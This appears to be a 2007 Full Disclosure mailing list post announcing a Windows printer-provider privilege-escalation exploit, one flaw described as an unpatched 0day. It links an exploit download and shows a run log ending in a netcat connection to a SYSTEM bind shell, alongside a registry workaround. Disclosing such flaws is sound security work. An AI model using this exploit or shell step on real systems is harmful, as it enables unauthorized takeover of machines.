Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

Universal printer provider exploit for Windows

From: "Andres Tarasco" <atarasco () gmail com>
Date: Mon, 29 Jan 2007 11:42:35 +0100
We have developed a new exploit that should allow code execution as SYSTEM
with the following software:

- DiskAccess NFS Client (dapcnfsd.dll v0.6.4.0) - REPORTED & NOTFIXED
-0day!!!
- Citrix Metaframe - cpprov.dll - FIXED
- Novell (nwspool.dll - CVE-2006-5854 - untested. pls give feedback)
More information at :
http://www.514.es/2007/01/universal_exploit_for_vulnerab.html (spanish)
exploit code:
http://www.514.es/2007/01/29/Universal_printer_provider_exploit.zip

/*
Title: Universal exploit for vulnerable printer providers (spooler service).
Vulnerability: Insecure EnumPrintersW() calls
Author: Andres Tarasco Acuña - atarasco () 514 es
Website: http://www.514.es


This code should allow to gain SYSTEM privileges with the following
software:
blink !blink! blink!

- DiskAccess NFS Client (dapcnfsd.dll v0.6.4.0) - REPORTED & NOTFIXED
-0day!!!
- Citrix Metaframe - cpprov.dll  - FIXED
- Novell (nwspool.dll  - CVE-2006-5854 - untested)
- More undisclosed stuff =)

 If this code crashes your spooler service (spoolsv.exe) check your
 "vulnerable" printer providers at:
 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Providers

 Workaround: Trust only default printer providers "Internet Print Provider"

 and "LanMan Print Services" and delete the other ones.

 And remember, if it doesnt work for you, tweak it yourself. Do not ask


 D:\Programación\EnumPrinters\Exploits>testlpc.exe
[+] Citrix Presentation Server - EnumPrinterW() Universal exploit
[+] Exploit coded by Andres Tarasco - atarasco () 514 es


[+] Connecting to spooler LCP port \RPC Control\spoolss
[+] Trying to locate valid address (1 tries)
[+] Mapped memory. Client address: 0x003d0000
[+] Mapped memory. Server address: 0x00a70000
[+] Targeting return address to  : 0x00A700A7
[+] Writting to shared memory...
[+] Written 0x1000 bytes
[+] Exploiting vulnerability....
[+] Exploit complete. Now Connect to 127.0.0.1:51477


D:\Programación\EnumPrinters>nc localhost 51477
Microsoft Windows XP [Versión 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM

regards,

Andres Tarasco

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Previous By Date Next
Previous By Thread Next

Current thread: